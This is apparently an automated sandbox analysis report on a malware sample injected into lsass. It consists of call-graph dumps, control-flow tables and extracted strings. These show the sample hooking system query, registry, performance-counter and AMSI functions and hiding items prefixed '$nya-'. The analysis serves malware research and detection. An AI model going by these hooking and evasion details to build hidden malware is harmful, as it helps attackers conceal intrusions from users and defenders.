8268->8269 8272 140ae869cd4 8269->8272 8271->8265 8273 140ae869aac __vcrt_FlsAlloc 5 API calls 8272->8273 8274 140ae869d02 8273->8274 8275 140ae869d14 TlsSetValue 8274->8275 8276 140ae869d0c 8274->8276 8275->8276 8276->8271 8670 140ae868f0c 8677 140ae86946c 8670->8677 8673 140ae868f19 8678 140ae869474 8677->8678 8680 140ae8694a5 8678->8680 8681 140ae868f15 8678->8681 8694 140ae869d28 8678->8694 8682 140ae8694b4 __vcrt_uninitialize_locks DeleteCriticalSection 8680->8682 8681->8673 8683 140ae869400 8681->8683 8682->8681 8699 140ae869bfc 8683->8699 8695 140ae869aac __vcrt_FlsAlloc 5 API calls 8694->8695 8696 140ae869d5e 8695->8696 8697 140ae869d73 InitializeCriticalSectionAndSpinCount 8696->8697 8698 140ae869d68 8696->8698 8697->8698 8698->8678 8700 140ae869aac __vcrt_FlsAlloc 5 API calls 8699->8700 8701 140ae869c21 TlsAlloc 8700->8701 9115 140ae865c8d 9116 140ae865c94 9115->9116 9117 140ae865cfb 9116->9117 9118 140ae865d77 VirtualProtect 9116->9118 9119 140ae865da3 GetLastError 9118->9119 9120 140ae865db1 9118->9120 9119->9120 8277 140ae874611 __scrt_dllmain_exception_filter 8703 140ae86c510 8704 140ae86c518 8703->8704 8706 140ae86c545 8704->8706 8707 140ae86c574 8704->8707 8708 140ae86c59f 8707->8708 8709 140ae86c582 DeleteCriticalSection 8708->8709 8710 140ae86c5a3 8708->8710 8709->8708 8710->8706 8559 140ae87479d 8562 140ae86af34 8559->8562 8563 140ae86af4e 8562->8563 8565 140ae86af9b 8562->8565 8564 140ae869324 _CreateFrameInfo 9 API calls 8563->8564 8563->8565 8564->8565 8278 140ae86c218 8279 140ae86d2a0 __free_lconv_num 13 API calls 8278->8279 8280 140ae86c228 8279->8280 8281 140ae86d2a0 __free_lconv_num 13 API calls 8280->8281 8282 140ae86c23c 8281->8282 8283 140ae86d2a0 __free_lconv_num 13 API calls 8282->8283 8284 140ae86c250 8283->8284 8285 140ae86d2a0 __free_lconv_num 13 API calls 8284->8285 8286 140ae86c264 8285->8286 8711 140ae862518 GetProcessIdOfThread GetCurrentProcessId 8712 140ae862543 CreateFileW 8711->8712 8714 140ae8625be 8711->8714 8713 140ae862577 WriteFile ReadFile CloseHandle 8712->8713 8712->8714 8713->8714 8566 140ae871398 8567 140ae8713ae 8566->8567 8568 140ae8713f5 8567->8568 8570 140ae87140e 8567->8570 8569 140ae86d1f4 __std_exception_copy 13 API calls 8568->8569 8571 140ae8713fa 8569->8571 8573 140ae86dd78 14 API calls 8570->8573 8574 140ae871405 8570->8574 8572 140ae86d04c _invalid_parameter_noinfo 38 API calls 8571->8572 8572->8574 8573->8574 8715 140ae864320 8716 140ae86426d _invalid_parameter_noinfo 8715->8716 8717 140ae8642bd VirtualQuery 8716->8717 8718 140ae8642d7 8716->8718 8719 140ae864322 GetLastError 8716->8719 8717->8716 8717->8718 8719->8716 8287 140ae86f820 8290 140ae86f7d8 8287->8290 8295 140ae86c558 EnterCriticalSection 8290->8295 8296 140ae86fe20 8297 140ae86fe4a 8296->8297 8298 140ae86d220 __std_exception_copy 13 API calls 8297->8298 8299 140ae86fe6a 8298->8299 8300 140ae86d2a0 __free_lconv_num 13 API calls 8299->8300 8301 140ae86fe78 8300->8301 8302 140ae86fea2 8301->8302 8303 140ae86d220 __std_exception_copy 13 API calls 8301->8303 8304 140ae86fec1 InitializeCriticalSectionEx 8302->8304 8306 140ae86feab 8302->8306 8305 140ae86fe94 8303->8305 8304->8302 8307 140ae86d2a0 __free_lconv_num 13 API calls 8305->8307 8307->8302 9144 140ae86aaac 9145 140ae86aad9 __except_validate_context_record 9144->9145 9146 140ae869324 _CreateFrameInfo 9 API calls 9145->9146 9147 140ae86aade 9146->9147 9149 140ae86ab38 9147->9149 9151 140ae86abc6 9147->9151 9158 140ae86ab8c 9147->9158 9148 140ae86ac34 9148->9158 9186 140ae86a22c 9148->9186 9150 140ae86abb3 9149->9150 9149->9158 9159 140ae86ab5a __GetCurrentState 9149->9159 9173 140ae8695d0 9150->9173 9155 140ae86abe5 9151->9155 9180 140ae8699cc 9151->9180 9155->9148 9155->9158 9183 140ae8699e0 9155->9183 9156 140ae86acdd 9159->9156 9161 140ae86afb8 9159->9161 9162 140ae8699cc Is_bad_exception_allowed 9 API calls 9161->9162 9163 140ae86afe7 __GetCurrentState 9162->9163 9164 140ae869324 _CreateFrameInfo 9 API calls 9163->9164 9171 140ae86b004 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 9164->9171 9165 140ae86b0fb 9166 140ae869324 _CreateFrameInfo 9 API calls 9165->9166 9167 140ae86b100 9166->9167 9168 140ae869324 _CreateFrameInfo 9 API calls 9167->9168 9169 140ae86b10b __FrameHandler3::GetHandlerSearchState 9167->9169 9168->9169 9169->9158 9170 140ae8699cc 9 API calls Is_bad_exception_allowed 9170->9171 9171->9165 9171->9169 9171->9170 9172 140ae8699f4 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 9171->9172 9172->9171 9243 140ae869634 9173->9243 9175 140ae8695ef __FrameHandler3::GetHandlerSearchState 9247 140ae869540 9175->9247 9178 140ae86afb8 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 9179 140ae869624 9178->9179 9179->9158 9181 140ae869324 _CreateFrameInfo 9 API calls 9180->9181 9182 140ae8699d5 9181->9182 9182->9155 9184 140ae869324 _CreateFrameInfo 9 API calls 9183->9184 9185 140ae8699e9 9184->9185 9185->9148 9251 140ae86b144 9186->9251 9188 140ae86a6f4 9189 140ae86a373 9190 140ae86a645 9189->9190 9235 140ae86a3ab 9189->9235 9190->9188 9191 140ae86a643 9190->9191 9304 140ae86a6fc 9190->9304 9192 140ae869324 _CreateFrameInfo 9 API calls 9191->9192 9195 140ae86a687 9192->9195 9195->9188 9199 140ae868070 _invalid_parameter_noinfo 8 API calls 9195->9199 9196 140ae86a575 9196->9191 9200 140ae86a592 9196->9200 9203 140ae8699cc Is_bad_exception_allowed 9 API calls 9196->9203 9197 140ae869324 _CreateFrameInfo 9 API calls 9198 140ae86a2da 9197->9198 9198->9195 9201 140ae869324 _CreateFrameInfo 9 API calls 9198->9201 9202 140ae86a69a 9199->9202 9200->9191 9206 140ae86a5b4 9200->9206 9297 140ae8695a4 9200->9297 9205 140ae86a2ea 9201->9205 9202->9158 9203->9200 9207 140ae869324 _CreateFrameInfo 9 API calls 9205->9207 9206->9191 9208 140ae86a5ca 9206->9208 9209 140ae86a6d7 9206->9209 9210 140ae86a2f3 9207->9210 9211 140ae86a5d5 9208->9211 9214 140ae8699cc Is_bad_exception_allowed 9 API calls 9208->9214 9212 140ae869324 _CreateFrameInfo 9 API calls 9209->9212 9262 140ae869a0c 9210->9262 9218 140ae86b1dc 9 API calls 9211->9218 9215 140ae86a6dd 9212->9215 9214->9211 9217 140ae869324 _CreateFrameInfo 9 API calls 9215->9217 9220 140ae86a6e6 9217->9220 9221 140ae86a5eb 9218->9221 9219 140ae8699e0 9 API calls 9219->9235 9223 140ae86c2f4 14 API calls 9220->9223 9221->9191 9225 140ae869634 __FrameHandler3::GetHandlerSearchState RtlLookupFunctionEntry 9221->9225 9222 140ae869324 _CreateFrameInfo 9 API calls 9224 140ae86a335 9222->9224 9223->9188 9224->9189 9227 140ae869324 _CreateFrameInfo 9 API calls 9224->9227 9226 140ae86a605 9225->9226 9301 140ae869838 RtlUnwindEx 9226->9301 9229 140ae86a341 9227->9229 9230 140ae869324 _CreateFrameInfo 9 API calls 9229->9230 9231 140ae86a34a 9230->9231 9265 140ae86b1dc 9231->9265 9235->9196 9235->9219 9276 140ae86a96c 9235->9276 9290 140ae86a158 9235->9290 9237 140ae86a35e 9272 140ae86b2cc 9237->9272 9239 140ae86a366 __CxxCallCatchBlock std::bad_alloc::bad_alloc 9241 140ae869178 Concurrency::cancel_current_task 2 API calls 9239->9241 9242 140ae86a6d1 9239->9242 9240 140ae86c2f4 14 API calls 9240->9209 9241->9242 9242->9240 9246 140ae869662 __FrameHandler3::GetHandlerSearchState 9243->9246 9244 140ae86968c RtlLookupFunctionEntry 9244->9246 9245 140ae8696d4 9245->9175 9246->9244 9246->9245 9248 140ae869560 9247->9248 9249 140ae86958b 9247->9249 9248->9249 9250 140ae869324 _CreateFrameInfo 9 API calls 9248->9250 9249->9178 9250->9248 9252 140ae86b169 __FrameHandler3::GetHandlerSearchState 9251->9252 9253 140ae869634 __FrameHandler3::GetHandlerSearchState RtlLookupFunctionEntry 9252->9253 9254 140ae86b17e 9253->9254 9316 140ae869db4 9254->9316 9257 140ae86b1b3 9258 140ae869db4 __GetUnwindTryBlock RtlLookupFunctionEntry 9257->9258 9260 140ae86a28e 9258->9260 9259 140ae86b190 __FrameHandler3::GetHandlerSearchState 9319 140ae869dec 9259->9319 9260->9188 9260->9189 9260->9197 9263 140ae869324 _CreateFrameInfo 9 API calls 9262->9263 9264 140ae869a1a 9263->9264 9264->9188 9264->9222 9266 140ae86b2c3 9265->9266 9271 140ae86b207 9265->9271 9267 140ae86a35a 9267->9189 9267->9237 9268 140ae8699e0 9 API calls 9268->9271 9269 140ae8699cc Is_bad_exception_allowed 9 API calls 9269->9271 9270 140ae86a96c 9 API calls 9270->9271 9271->9267 9271->9268 9271->9269 9271->9270 9274 140ae86b2e9 Is_bad_exception_allowed 9272->9274 9275 140ae86b339 9272->9275 9273 140ae8699cc 9 API calls Is_bad_exception_allowed 9273->9274 9274->9273 9274->9275 9275->9239 9277 140ae86a999 9276->9277 9289 140ae86aa28 9276->9289 9278 140ae8699cc Is_bad_exception_allowed 9 API calls 9277->9278 9279 140ae86a9a2 9278->9279 9280 140ae8699cc Is_bad_exception_allowed 9 API calls 9279->9280 9281 140ae86a9bb 9279->9281 9279->9289 9280->9281 9282 140ae86a9e7 9281->9282 9283 140ae8699cc Is_bad_exception_allowed 9 API calls 9281->9283 9281->9289 9284 140ae8699e0 9 API calls 9282->9284 9283->9282 9285 140ae86a9fb 9284->9285 9286 140ae86aa14 9285->9286 9287 140ae8699cc Is_bad_exception_allowed 9 API calls 9285->9287 9285->9289 9288 140ae8699e0 9 API calls 9286->9288 9287->9286 9288->9289 9289->9235 9291 140ae869634 __FrameHandler3::GetHandlerSearchState RtlLookupFunctionEntry 9290->9291 9292 140ae86a195 9291->9292 9293 140ae8699cc Is_bad_exception_allowed 9 API calls 9292->9293 9294 140ae86a1cd 9293->9294 9295 140ae869838 9 API calls 9294->9295 9296 140ae86a211 9295->9296 9296->9235 9298 140ae8695b8 __FrameHandler3::GetHandlerSearchState 9297->9298 9299 140ae869540 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 9298->9299 9300 140ae8695c2 9299->9300 9300->9206 9302 140ae868070 _invalid_parameter_noinfo 8 API calls 9301->9302 9303 140ae869932 9302->9303 9303->9191 9305 140ae86a735 9304->9305 9306 140ae86a948 9304->9306 9307 140ae869324 _CreateFrameInfo 9 API calls 9305->9307 9306->9191 9308 140ae86a73a 9307->9308 9309 140ae86a759 EncodePointer 9308->9309 9314 140ae86a7ac 9308->9314 9310 140ae869324 _CreateFrameInfo 9 API calls 9309->9310 9311 140ae86a769 9310->9311 9311->9314 9322 140ae8694ec 9311->9322 9313 140ae8699cc 9 API calls Is_bad_exception_allowed 9313->9314 9314->9306 9314->9313 9315 140ae86a158 19 API calls 9314->9315 9315->9314 9317 140ae869634 __FrameHandler3::GetHandlerSearchState RtlLookupFunctionEntry 9316->9317 9318 140ae869dc7 9317->9318 9318->9257 9318->9259 9320 140ae869634 __FrameHandler3::GetHandlerSearchState RtlLookupFunctionEntry 9319->9320 9321 140ae869e06 9320->9321 9321->9260 9323 140ae869324 _CreateFrameInfo 9 API calls 9322->9323 9324 140ae869518 9323->9324 9324->9314 8308 140ae86c828 8309 140ae86c842 8308->8309 8310 140ae86c82d 8308->8310 8314 140ae86c848 8310->8314 8315 140ae86c892 8314->8315 8316 140ae86c88a 8314->8316 8318 140ae86d2a0 __free_lconv_num 13 API calls 8315->8318 8317 140ae86d2a0 __free_lconv_num 13 API calls 8316->8317 8317->8315 8319 140ae86c89f 8318->8319 8320 140ae86d2a0 __free_lconv_num 13 API calls 8319->8320 8321 140ae86c8ac 8320->8321 8322 140ae86d2a0 __free_lconv_num 13 API calls 8321->8322 8323 140ae86c8b9 8322->8323 8324 140ae86d2a0 __free_lconv_num 13 API calls 8323->8324 8325 140ae86c8c6 8324->8325 8326 140ae86d2a0 __free_lconv_num 13 API calls 8325->8326 8327 140ae86c8d3 8326->8327 8328 140ae86d2a0 __free_lconv_num 13 API calls 8327->8328 8329 140ae86c8e0 8328->8329 8330 140ae86d2a0 __free_lconv_num 13 API calls 8329->8330 8331 140ae86c8ed 8330->8331 8332 140ae86d2a0 __free_lconv_num 13 API calls 8331->8332 8333 140ae86c8fd 8332->8333 8334 140ae86d2a0 __free_lconv_num 13 API calls 8333->8334 8335 140ae86c90d 8334->8335 8340 140ae86c6f8 8335->8340 8354 140ae86c558 EnterCriticalSection 8340->8354 8575 140ae8633a8 8576 140ae8633cf 8575->8576 8577 140ae86349c 8576->8577 8578 140ae8633ec PdhGetCounterInfoW 8576->8578 8578->8577 8579 140ae86340e GetProcessHeap HeapAlloc PdhGetCounterInfoW 8578->8579 8580 140ae863440 StrCmpW 8579->8580 8581 140ae863488 GetProcessHeap HeapFree 8579->8581 8580->8581 8582 140ae863455 8580->8582 8581->8577 8582->8581 8584 140ae863950 StrCmpNW 8582->8584 8585 140ae863982 StrStrW 8584->8585 8586 140ae8639f2 8584->8586 8585->8586 8587 140ae86399b StrToIntW 8585->8587 8586->8582 8587->8586 8588 140ae8639c3 8587->8588 8588->8586 8594 140ae861a30 OpenProcess 8588->8594 8591 140ae863f88 StrCmpNIW 8592 140ae8639e4 8591->8592 8592->8586 8593 140ae861cfc 2 API calls 8592->8593 8593->8586 8595 140ae861ab6 8594->8595 8596 140ae861a64 K32GetModuleFileNameExW 8594->8596 8595->8586 8595->8591 8597 140ae861a7e PathFindFileNameW lstrlenW 8596->8597 8598 140ae861aad CloseHandle 8596->8598 8597->8598 8599 140ae861a9c StrCpyW 8597->8599 8598->8595 8599->8598 8600 140ae870fa8 8601 140ae870fcc 8600->8601 8602 140ae868070 _invalid_parameter_noinfo 8 API calls 8601->8602 8603 140ae87100e 8602->8603 8723 140ae86bd34 8724 140ae86bd4d 8723->8724 8734 140ae86bd49 8723->8734 8725 140ae86e864 56 API calls 8724->8725 8726 140ae86bd52 8725->8726 8738 140ae86edc8 GetEnvironmentStringsW 8726->8738 8729 140ae86bd5f 8732 140ae86d2a0 __free_lconv_num 13 API calls 8729->8732 8730 140ae86bd6b 8758 140ae86bda8 8730->8758 8732->8734 8735 140ae86d2a0 __free_lconv_num 13 API calls 8736 140ae86bd92 8735->8736 8737 140ae86d2a0 __free_lconv_num 13 API calls 8736->8737 8737->8734 8739 140ae86bd57 8738->8739 8740 140ae86edf8 8738->8740 8739->8729 8739->8730 8741 140ae86ece8 WideCharToMultiByte 8740->8741 8742 140ae86ee49 8741->8742 8743 140ae86ee53 FreeEnvironmentStringsW 8742->8743 8744 140ae86c5d0 14 API calls 8742->8744 8743->8739 8745 140ae86ee63 8744->8745 8746 140ae86ee74 8745->8746 8747 140ae86ee6b 8745->8747 8748 140ae86ece8 WideCharToMultiByte 8746->8748 8749 140ae86d2a0 __free_lconv_num 13 API calls 8747->8749 8750 140ae86ee97 8748->8750 8751 140ae86ee72 8749->8751 8752 140ae86eea5 8750->8752 8753 140ae86ee9b 8750->8753 8751->8743 8755 140ae86d2a0 __free_lconv_num 13 API calls 8752->8755 8754 140ae86d2a0 __free_lconv_num 13 API calls 8753->8754 8756 140ae86eea3 FreeEnvironmentStringsW 8754->8756 8755->8756 8756->8739 8759 140ae86bdcd 8758->8759 8760 140ae86d220 __std_exception_copy 13 API calls 8759->8760 8770 140ae86be03 8760->8770 8761 140ae86d2a0 __free_lconv_num 13 API calls 8763 140ae86bd73 8761->8763 8762 140ae86be6d 8764 140ae86d2a0 __free_lconv_num 13 API calls 8762->8764 8763->8735 8764->8763 8765 140ae86d220 __std_exception_copy 13 API calls 8765->8770 8766 140ae86be92 8768 140ae86bebc 13 API calls 8766->8768 8767 140ae86c328 __std_exception_copy 38 API calls 8767->8770 8769 140ae86be9a 8768->8769 8771 140ae86d2a0 __free_lconv_num 13 API calls 8769->8771 8770->8762 8770->8765 8770->8766 8770->8767 8772 140ae86bea6 8770->8772 8773 140ae86be0b 8770->8773 8775 140ae86d2a0 __free_lconv_num 13 API calls 8770->8775 8771->8773 8774 140ae86d06c _invalid_parameter_noinfo 17 API calls 8772->8774 8773->8761 8776 140ae86beb9 8774->8776 8775->8770 9325 140ae862ab4 TlsGetValue TlsGetValue TlsGetValue 9326 140ae862b0d 9325->9326 9331 140ae862b79 9325->9331 9328 140ae862b15 9326->9328 9326->9331 9327 140ae862b74 9328->9327 9329 140ae862c32 TlsSetValue TlsSetValue TlsSetValue 9328->9329 9330 140ae863f88 StrCmpNIW 9328->9330 9329->9327 9330->9328 9331->9327 9331->9329 9332 140ae863f88 StrCmpNIW 9331->9332 9332->9331 8356 140ae866430 8357 140ae86643d 8356->8357 8358 140ae866449 8357->8358 8363 140ae86655a 8357->8363 8359 140ae8664cd 8358->8359 8360 140ae8664a6 SetThreadContext 8358->8360 8360->8359 8361 140ae866581 VirtualProtect FlushInstructionCache 8361->8363 8362 140ae86663e 8364 140ae86665e 8362->8364 8366 140ae864b20 VirtualFree 8362->8366 8363->8361 8363->8362 8365 140ae865530 3 API calls 8364->8365 8367 140ae866663 8365->8367 8366->8364 8368 140ae8666b7 8367->8368 8369 140ae866677 ResumeThread 8367->8369 8370 140ae868070 _invalid_parameter_noinfo 8 API calls 8368->8370 8369->8367 8371 140ae8666ff 8370->8371 8372 140ae86ec30 GetCommandLineA GetCommandLineW 7601 140ae861e3c LoadLibraryA GetProcAddress 7602 140ae861e62 SleepEx 7601->7602 7603 140ae861e6f 7601->7603 7602->7602 9333 140ae8634b8 9334 140ae8634e8 9333->9334 9335 140ae8635a1 9334->9335 9336 140ae863505 PdhGetCounterInfoW 9334->9336 9336->9335 9337 140ae863523 GetProcessHeap HeapAlloc PdhGetCounterInfoW 9336->9337 9338 140ae863555 StrCmpW 9337->9338 9339 140ae86358d GetProcessHeap HeapFree 9337->9339 9338->9339 9340 140ae86356a 9338->9340 9339->9335 9340->9339 9341 140ae863950 12 API calls 9340->9341 9341->9340

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 41 140ae8627e8-140ae86286c NtQueryDirectoryFileEx 42 140ae862872-140ae862875 41->42 43 140ae862a90-140ae862ab3 41->43 42->43 44 140ae86287b-140ae862889 42->44 44->43 45 140ae86288f-140ae8628d5 call 140ae8740e0 * 3 GetFileType 44->45 52 140ae8628d7-140ae8628eb StrCpyW 45->52 53 140ae8628ed-140ae8628f7 call 140ae861ad4 45->53 54 140ae8628fc-140ae862900 52->54 53->54 56 140ae862906-140ae86290b 54->56 57 140ae8629ed-140ae862a06 call 140ae86376c call 140ae863f88 54->57 58 140ae86290e-140ae862913 56->58 69 140ae86299d-140ae8629e7 57->69 70 140ae862a08-140ae862a37 call 140ae86376c call 140ae863708 call 140ae861dd4 57->70 60 140ae862915-140ae862918 58->60 61 140ae862930 58->61 60->61 64 140ae86291a-140ae86291d 60->64 65 140ae862933-140ae86294c call 140ae86376c call 140ae863f88 61->65 64->61 67 140ae86291f-140ae862922 64->67 79 140ae862952-140ae862981 call 140ae86376c call 140ae863708 call 140ae861dd4 65->79 80 140ae862a3f-140ae862a41 65->80 67->61 71 140ae862924-140ae862927 67->71 69->43 69->57 70->69 96 140ae862a3d 70->96 71->61 74 140ae862929-140ae86292e 71->74 74->61 74->65 79->80 102 140ae862987-140ae862992 79->102 84 140ae862a62-140ae862a65 80->84 85 140ae862a43-140ae862a5d 80->85 88 140ae862a67-140ae862a6d 84->88 89 140ae862a6f-140ae862a72 84->89 85->58 88->43 92 140ae862a74-140ae862a77 89->92 93 140ae862a8d 89->93 92->93 94 140ae862a79-140ae862a7c 92->94 93->43 94->93 97 140ae862a7e-140ae862a81 94->97 96->43 97->93 99 140ae862a83-140ae862a86 97->99 99->93 101 140ae862a88-140ae862a8b 99->101 101->43 101->93 102->58 103 140ae862998 102->103 103->43
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                      • Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: File$DirectoryQueryType
                                                                      • String ID: \\.\pipe\
                                                                      • API String ID: 4175507832-91387939
                                                                      • Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                                                      • Instruction ID: 5daaeb0bb4aa518c6dce806cbe9e5c24b9ba21a6c2de6fb8d116667fb054e964
                                                                      • Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                                                      • Instruction Fuzzy Hash: C671C432690B8141E7769F2B98443EAA794F38DBE5F640026DF4D57BA9DE74CE00C781

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 104 140ae862300-140ae86233a NtQuerySystemInformation 105 140ae862343-140ae862346 104->105 106 140ae86233c-140ae862340 104->106 107 140ae8624f7-140ae862517 105->107 108 140ae86234c-140ae86234f 105->108 106->105 109 140ae862447-140ae86244a 108->109 110 140ae862355-140ae862367 108->110 112 140ae86244c-140ae862466 call 140ae8635c8 109->112 113 140ae8624bb-140ae8624be 109->113 110->107 111 140ae86236d-140ae862379 110->111 114 140ae8623a7-140ae8623b2 call 140ae861cc4 111->114 115 140ae86237b-140ae86238b 111->115 112->107 125 140ae86246c-140ae862482 112->125 113->107 116 140ae8624c0-140ae8624d3 call 140ae8635c8 113->116 122 140ae8623d3-140ae8623e5 114->122 127 140ae8623b4-140ae8623cc call 140ae861d30 114->127 115->114 118 140ae86238d-140ae8623a5 StrCmpNIW 115->118 116->107 126 140ae8624d5-140ae8624dd 116->126 118->114 118->122 128 140ae8623e7-140ae8623e9 122->128 129 140ae8623f5-140ae8623f7 122->129 125->107 130 140ae862484-140ae8624a0 125->130 126->107 131 140ae8624df-140ae8624e7 126->131 127->122 144 140ae8623ce-140ae8623d1 127->144 133 140ae8623f0-140ae8623f3 128->133 134 140ae8623eb-140ae8623ee 128->134 135 140ae8623fe 129->135 136 140ae8623f9-140ae8623fc 129->136 137 140ae8624a4-140ae8624b7 130->137 140 140ae8624ea-140ae8624f5 131->140 138 140ae862401-140ae862404 133->138 134->138 135->138 136->138 137->137 139 140ae8624b9 137->139 142 140ae862406-140ae86240c 138->142 143 140ae862412-140ae862415 138->143 139->107 140->107 140->140 142->111 142->143 143->107 145 140ae86241b-140ae86241f 143->145 144->138 146 140ae862436-140ae862442 145->146 147 140ae862421-140ae862424 145->147 146->107 147->107 148 140ae86242a-140ae86242f 147->148 148->145 149 140ae862431 148->149 149->107
                                                                      APIs
                                                                      • NtQuerySystemInformation.NTDLL ref: 00000140AE86232B
                                                                      • StrCmpNIW.SHLWAPI ref: 00000140AE86239A
                                                                        • Part of subcall function 00000140AE8635C8: GetProcessHeap.KERNEL32(?,?,?,?,?,00000140AE8624D1), ref: 00000140AE8635EB
                                                                        • Part of subcall function 00000140AE8635C8: HeapAlloc.KERNEL32(?,?,?,?,?,00000140AE8624D1), ref: 00000140AE8635FE
                                                                        • Part of subcall function 00000140AE8635C8: StrCmpNIW.SHLWAPI(?,?,?,?,?,00000140AE8624D1), ref: 00000140AE863673
                                                                        • Part of subcall function 00000140AE8635C8: GetProcessHeap.KERNEL32(?,?,?,?,?,00000140AE8624D1), ref: 00000140AE8636D9
                                                                        • Part of subcall function 00000140AE8635C8: HeapFree.KERNEL32(?,?,?,?,?,00000140AE8624D1), ref: 00000140AE8636E7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                      • Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocFreeInformationQuerySystem
                                                                      • String ID: $nya-$S
                                                                      • API String ID: 722747020-3492252248
                                                                      • Opcode ID: 4ac77b2c6d0e63e88a47bc1c42b4b05fc6ca31a13af142bc6dc0eee490c53e66
                                                                      • Instruction ID: 10c93ae40967d366460c1af3af3ae598b1b5004c114e359773f8e4e7b576045f
                                                                      • Opcode Fuzzy Hash: 4ac77b2c6d0e63e88a47bc1c42b4b05fc6ca31a13af142bc6dc0eee490c53e66
                                                                      • Instruction Fuzzy Hash: 9851AC32B5076482E762CB2B9A40AEDA3A4F74C7A8F248465DF4D17B74DB39CC41C381

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                      • Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                                                                      • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                                                      • API String ID: 1735320900-4225371247
                                                                      • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                                      • Instruction ID: 41dc577e75bb4b21c8b492373be71e11fafd3efd7900aa5ae2dddf2e0a44fe51
                                                                      • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                                      • Instruction Fuzzy Hash: 12517DB0190B4AA5FB03EB6BEC407D47722B74C3A5FB405529E0D13675DE788A5AC3D2

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                      • Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: FinalHandleNamePathlstrlen
                                                                      • String ID: \\?\
                                                                      • API String ID: 2719912262-4282027825
                                                                      • Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                                                      • Instruction ID: 197f69b0064b74f6fe5d1c82fd5d8c120420200035a2451899f7178f69e32035
                                                                      • Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                                                      • Instruction Fuzzy Hash: D7F03C7234478592EB219B22F9843996361FB48BA8FA440259F4D47975DE7CCA88CB41

                                                                      Control-flow Graph

